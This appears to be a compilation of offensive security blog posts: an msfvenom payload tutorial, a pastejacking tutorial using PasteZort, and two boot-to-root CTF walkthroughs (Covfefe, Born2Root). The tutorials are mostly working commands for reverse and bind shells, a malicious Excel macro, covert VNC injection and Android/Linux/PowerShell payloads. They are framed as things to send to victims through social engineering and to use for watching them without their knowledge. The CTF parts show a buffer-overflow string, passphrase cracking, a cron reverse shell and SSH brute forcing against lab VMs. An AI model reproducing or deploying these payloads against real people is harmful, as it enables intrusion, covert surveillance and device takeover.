Msfvenom Tutorials for Beginners

Hello friends!!

Today we will learn to create payloads from a popular tool known as metasploit, we will explore various option available within the tool to create payloads with different extensions and techniques.

Msfvenom

Msfvenom is a command line instance of Metasploit that is used to generate and output all of the various types of shell code that are available in Metasploit.

Requirements:

• Kali Linux            

• Windows Machine

• Android Phone

• Linux Machine

Abbreviations:

Lhost= (IP of Kali)

Lport= (any port you wish to assign to the listener)

P= (Payload I.e. Windows, android, PHP etc.)

F= file extension (i.e. windows=exe, android=apk etc.)

Let’s Begin!!

From the Kali terminal type command msfvenom as shown below. It will show you all available options for creating a payload but in this article we are talking about different types of payload we can generate.

Bind shell

A bind shell is the kind that opens up a new service on the target machine, and requires the attacker to connect to it in order to get a session

Now type the below “command” on your kali terminal

msfvenom -p windows/meterpreter/bind_tcp -f exe > /root/Desktop/bind.exe

It will save the “exe” payload file on your desktop as specified on the command /root/Desktop/bind.exe We need to send this file to the victim machine through file share or by any social engineering technique and have it run on the system

Now let us start msfconsole and type below command to get session of victim machine

msf > use exploit/multi/handler

msf exploit(handler) > set payload windows/meterpreter/bind_tcp

msf exploit(handler) > set rhost IP 192.168.0.100

msf exploit(handler) > set lport 4444

msf exploit(handler) > exploit

Once the file is executed on the machine we will get the victim machine meterpreter session as show below:

The bind_tcp option is helpful in case we get disconnected from victim machine while it is still running, we can execute the same command and get back the session without any intervention of the victim to run the exploit again.

Reverse TCP Payload

A reverse shell (also known as a connect-back) is the exact opposite: it requires the attacker to set up a listener first on his box, the target machine acts as a client connecting to that listener, and then finally the attacker receives the shell.

From the Kali terminal type command msfvenom as shown below:

Now type command

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.107 lport=5555 -f exe > / root/Desktop/reverse_tcp.exe.

In this case we will include few other options such as lhost (local host) and lport (local port) to get a reverse connection from the victim machine

Once the payload is generated and send to the victim for execution, we will start our next step as shown below

Now let us start msfconsole and type below command to get session of victim machine

msf > use exploit/multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

msf exploit(handler) > set lhost IP 192.168.0.107

msf exploit(handler) > set lport 5555

msf exploit(handler) > exploit

We can confirm from the image below, once the payload is executed by the victim, we received a reverse connection and got the meterpreter session successfully.

HTTPS Payload

Note: Both the above payloads can be used in case we have relevant ports active on the victim machine, so the question arises what if the victim has blocked all the ports?

Well in such cases we can create payloads as per the ports running on victim machine such as 443 for https:

Let’s us use this case and create a payload with https   From the Kali terminal type command msfvenom as shown below:

Now type command

msfvenom -p windows/meterpreter/reverse_https lhost=192.168.0.107 lport=443 -f exe > /root/Desktop/443.exe

Once the payload is generated and send to the victim for execution, we will start our next step as shown below

Now let us start msfconsole and type below command to get session of victim machine

msf > use exploit/multi/handler

msf exploit(handler) > set payload windows/meterpreter/bind_https

msf exploit(handler) > set lhost IP 192.168.0.107

msf exploit(handler) > set lport 443

msf exploit(handler) > exploit

We can confirm from the above image, once the payload is executed by the victim, we received a reverse connection and got the meterpreter session.

Hidden Bind TCP Payload

Let us now explore some other technique available in msfvenom Tool and try to exploit the victim machine, this time we will get the shell of the victim machine instead of meterpreter session

Let’s begin!!

This payload hides on the background silently, while executed and does not reveal its presence if scanned by any port scanner.

From the Kali terminal type command msfvenom as shown below:

msfvenom -p windows/shell_hidden_bind_tcp ahost=192.168.0.107 lport=1010 -f exe > /root/Desktop/hidden.exe

Once the payload is generated and send to the victim for execution, we will start our next step as shown below.

We use Netcat to setup our listener.

Now from the kali Terminal let us type the command as shown above

nc 192.168.0.100 1010

Reverse Shell Payload with Netcat

Let us now do the same process and use shell_reverse_tcp payload, one more technique to get shell session of the victim

From the Kali terminal type command msfvenom as shown below:

msfvenom -p windows/shell_reverse_tcp ahost=192.168.0.107 lport=1111-f exe > /root/Desktop/ncshell.exe

Once the payload is generated and send to the victim for execution, we will start our next step as shown below

We setup our listener using netcat, the image below confirms the shell session capture by the kali machine.

Now from the kali Terminal let us type the command as shown below.

nc -lvp 1111

Macro Payload

Let us now create a payload with a Vba script, which we will use to create a macro on Excel to exploit victim machine.

Let us begin to create the payload!!

Open Kali Terminal and type command as mention below:

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.107 lport=7777 -f vba

once the command is executed copy the script starting from “#if vba 7 till “End if” as highlighted in below image:

Let us now open an excel file and press alt+F11 key to open VB script, you will get the option box as shown above, enter the name you will like to provide and click on “create”.

You will get a new option box as above, click on “This workbook” and replace the values with your copied vb script payload generated by msfvenom tool and close the vb script editor and enable the macro.

Now you may draft your excel file with relevant data which may look realistic for an victim to open the file, in our case we have just inserted the value “Test”  save the file and send it to the victim.

To capture the sessions let us now start the multi handler as stated below:

Open kali Terminal and type msfconsole

msf > use exploit/multi/handler

msf exploit(handler) > set paylaod windows/meterpreter/reverse_tcp

msf exploit(handler) > set lhost=192.168.0.107

msf exploit(handler) > set lport= 7777

msf exploit(handler) > exploit

Once the excel file is opened by the victim, it will prompt the victim to enable the macro, once enabled, our vbscript will get executed to provide us with reverse connection to the victim machine as show in the below image.

VNC Payload

Will it not be great if we can take the remote of victim machine without their knowledge and observe their activity anonymously,  this payload does exactly that , let us use it to our benefit.

Let us begin to create the payload!! Open Kali Terminal and type command as mention below:

msfvenom -p windows/vncinject/reverse_tcp lhost=192.168.0.107 lport=5900 -f exe > /root/Desktop/vnc.exe

Once the payload is generated and send to the victim for execution, we will start our next step as shown below. To capture the sessions let us now start the multi handler as stated below:

Open kali Terminal and type msfconsole

msf exploit(handler) > use exploit/multi/handler

msf exploit(handler) > set paylaod windows/vncinject/reverse_tcp

msf exploit(handler) > set lhost 192.168.0.107

msf exploit(handler) > set lport= 5900

msf exploit(handler) > exploit

We can see that reverse connection has executed the VNC injection and the victim remote machine session is established on our kali machine showing Remote Desktop.

Android Payload

Exploiting handheld devices have always been as hot topic and still continues, hence we have included it in our article as well, let us use one of the android exploit available within the msfvenom tool and use it to our benefit.

Let’s begin

Open Kali Terminal and type command as mention below:

msfvenom -p andriod/meterpreter/reverse_tcp lhost=192.168.0.107 lport=8888 > /root/Desktop/file.apk

Once the payload gets generated send it to the victim to execute on his handheld, and start multi handler as shown in below image.

msf > use exploit/multi/handler

msf exploit(handler) > set payload android/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.0.107

msf exploit(handler) > set lport 8888

msf exploit(handler) > exploit

Once the payload gets executed, you will get the meterpreter session of the handheld, which is now in your control as shown below.

Linux Payload

Open Kali Terminal and type command as mention below:

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.0.107 lport=4444 -f elf > /root/Desktop/shell

Once the payload gets generated send it to the victim to execute on his Linux machine and start multi handler as shown in below image.

msf > use exploit/multi/handler

msf exploit(handler) > set payload inux/x86/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.0.107

msf exploit(handler) > set lhost 4444

msf exploit(handler) > run

Once the payload gets executed, it will create a reverse tcp connection on our kali machine providing us with meterpreter sessions, as shown on the image below.

Powershell Payload

Open Kali Terminal and type command as mention below:

msfvenom -p cmd/windows/reverse_powershell  lhost=192.168.0.107 lport=4444 > /root/Desktop/shell.bat

Once the payload gets generated send it to the victim to execute on his windows machine and start multi handler as shown in below image.

msf > use multi/handler

msf exploit(handler) > set payload cmd/windows/reverse_powershell

msf exploit(handler) > set lhost 192.168.0.107

msf exploit(handler) > set lport 4444

msf exploit(handler) > run

Once the payload gets executed, it will create a reverse connection to shell as shown in the image below.

Hack the Covfefe VM (CTF Challenge)

Today we are going to take on another challenge known as “covfefe” .IT is a Debian 9 based Boot to root VM, originally created as a CTF for SecTalks_BNE. The author of this VM is “Tim Kent”.   We have to find 3 flags to complete the challenge.

You can download this VM:  https://download.vulnhub.com/covfefe/covfefe.ova

Security Level: Beginner

Penetrating Methodology:

Scanning

·         Netdiscover

·         NMAP

Enumeration

·         Web spidering

·         Directory enumeration

Exploiting

·         Ssh login

·         John

Privilege Escalation

·         Exploiting SUID Executables

Capture the Flag

Walkthrough

Scanning

Let’s start off by scanning the network and identifying host IPs. As illustrated below, we can identify our host IP as 192.168.1.101.

netdiscover

Time to scan the Target’s IP with Nmap.

nmap -A 192.168.1.101

As you can see in following screenshot that port 22 ,80 and 31337 are open.

Enumeration

Browsing the IP with HTTP port 31337 doesn’t give any result.

Directory enumeration using dirb shows two interesting directories “/.ssh” and “/.robots.txt”. Nmap scan has earlier shown robots.txt as well but to dig dipper we went with dirb.

dirb http://192.168.1.101:31337/

Further enumeration of robots.txt using curl shows a file “/taxes” among others. And as soon as we open it, we get our first flag.

curl http:// 192.168.1.101:31337/robots.txt

On browsing 192.168.1.101:31337/.ssh we find ssh private and public key respectively as ‘id_rsa’ and ‘id_rsa.pub’ & authorized_keys.

We get a download prompt while opening ‘authorized_keys’ in the browser so we download it. We downloaded id_rsa too in the same way.

When we open authorized_keys we find a username ‘simon’ for the private key.

cat authorized_keys

Exploiting

Now we use the private key to connect to the VM through ssh. But it is asking for a passphrase here.

ssh -i id_rsa simon@192.168.1.101

We have to change its format, which can be done using a john utility called “ssh2john”. It will convert ‘ id_rsa’  to a hash format recognized by johntheripper. Now let’s use John the Ripper to crack this hash.

chmod 777 ssh2john.py

python ssh2john.py id_rsa > hash

john hash –show

We find that passphrase of the key is starwars. Now we use this passphrase along with the key to connect through ssh. 

After successful ssh login using our newly acquired passphrase, we search for the SUID binaries.

ssh -i id_rsa simon@192.168.1.101

find / -perm -u=s -type f 2>/dev/null

Here we notice ‘usr/local/bin/read_message” that takes the user input and displays a message. We provide ‘simon’ as username when asked. There is a hint for username inside the message. It should be ‘Simon’ instead of ‘simon’.

usr/local/bin/read_message

Privilege Escalation

Again when we open ‘read_message’  and provide ‘Simon’ as username,  we get a message with  a hint that we can find  something in root. Now when we enter the ‘/root’ folder and list its content we find two files named ‘flag.txt’ and ‘read_message.c’. We can’t access flag.txt yet. Moving on, inside ‘read_message’  we find our second flag.

cd /root

ls

cat flag.txt

cat read_meassage.c

In above screenshot reading through the source code we find that, when we enter a string it reads the first 5 characters of the string as Simon, if it matches then it runs /usr/local/sbin/message. But the input allocation for this is 20 bytes. So, we have to overflow the stack entering more than 20 bytes of data. We use the first 5 char to be ‘Simon’ followed by 15 ‘A’ and then ‘/bin/sh’ at the 21^st byte.

read_message

SimonAAAAAAAAAAAAAAA/bin/sh

cd /root

ls

cat flag.txt

As soon as we provide this string, we spawn a shell as root. Now we can access flag.txt. Finally, we found the third flag.

Exploiting Remote machine with Pastejacking

Pastejacking is a technique that takes over the clipboard of a machine, for instance, when we copy text from a website, that text can be riddled with malicious code that will execute when you paste that text. This is a very good way to achieve a Meterpreter session because of its simplicity. All that needs to be done is; copy some harmless words from the browser and paste them on the command prompt and that’s it, session!!

We are going to walk you through the process, using a tool called PasteZort

Here’s how it happens:

The first thing you’ll need to do is get the tool from Github.

To keep it simple, from you Kali terminal, navigate to the desktop using “cd Desktop”. Once you’re at “root@kali:~/Desktop#”, type “git clone https://github.com/Zetahack/PasteZort.git”. This will make a PasteZort folder on your desktop with the tool in it.

Open the folder and you will see all the files you need to run this tool, the inside of the folder will look like the screenshot given below.

In order to execute the tool we first must change the permission of the “encode.rb” file. Right click on the “encode.rb” file and open its properties, under properties, go to the “Permissions” tab, check the box in front of “Execute” that says “Allow executing file as program”.

Navigate to the PasteZort folder from the Kali terminal, now execute the tool using “python ./PasteZOrt.py”. Your tool is now running.

Now we can get started making our pastejacking payload using the tools interphase. We will be making a windows payload, so in front of “Objectves:” type “1” to choose Windows as the targeted operating system.

After that, again choose option “1” under “Select Payload” to generate a windows reverse tcp shell. Enter your IP address in “LHOST” and the port number you want the exploit to communicate with in “LPORT”

You will now get an option to enter the message you want displayed as the pastejacking text, for example: we have written “ping” and “http://www.hackingarticles.in”.

And that’s it, your payload is ready.

You will now be asked to if you would like to turn on Handler, type “Y” and press enter

Open a web browser on the victim machine and enter your IP in the address bar, the text you typed in the message section will appear, select the text and copy it.

Open command prompt on the victim machine, paste the copied text and press Enter.

Go back to the Kali terminal and you will see Handler starting the reverse tcp and that’s it, you’ve done it. You now have a Meterpreter session, plain and simple.

Hack the Born2Root VM (CTF Challenge)

Hello friends! Today we are going to take another CTF challenge known as Born2Root. The credit for making this vm machine goes to “Hadi Mene” and it is another boot2root challenge where we have to root the server to complete the challenge. You can download this VM here.

Let’s Breach!!!

Let us start form getting to know the IP of VM (Here, I have it at 192.168.1.137 but you will have to find your own)

netdiscover

Use nmap for port enumeration.

nmap -sV 192.168.1.137

Nmap scan shows us port 80 is open, so we open the ip address in our browser.

We don’t find anything on the web page. So we use dirb to find the directories for more information.

dirb http://192.168.1.104/

Now the dirb scan shows us directories. We open the icons/ directory and find few files.

Among the files there is a text file we open it and find a private key.

We use this key to login through ssh to the target machine we use the names we find on the page we first opened. First we change the permissions of the private key. Then we use it to connect through ssh.

chmod 600 id_rsa

ssh -i id_rsa martin@192.168.1.137

When we connect it will ask for password just press enter, it is there for trolling.

Searching through the files we take a look at cron job.

cat /etc/crontab

We find that a file to called sekurity.py in the /tmp/ is to be executed every 5 minutes. But the file is missing from the folder. So we create a reverse shell of our own and save it as sekurity.py in the /tmp/ folder.

Now we set up our listener using netcat and wait for the cronjob to execute our file. Once the file is executed we get our reverse shell as a different user.

We couldn’t find anything that could help us root the machine. Now we use the third the user to root the machine. We know that the third user is hadi. So we create a dictionary using this name.

We use cupp to create a dictionary.

After we create a dictionary we use metasploit to bruteforce our way into ssh.

msf > use auxiliary/scanner/ssh/ssh_login

msf(ssh_login) > set rhosts 192.168.1.137

msf(ssh_login > set username hadi

msf(ssh_login > set pass_file hadi.txt

msf(ssh_login > run

Now once we enter the shell we spawn the terminal and use hadi’s password (‘hadi123’) to enter the root shell.

python -c “import pty; pty.spawn(‘/bin/bash’)”

su - root

Now that we are root we open the flag.txt and find a congratulatory message for completing the VM challenge.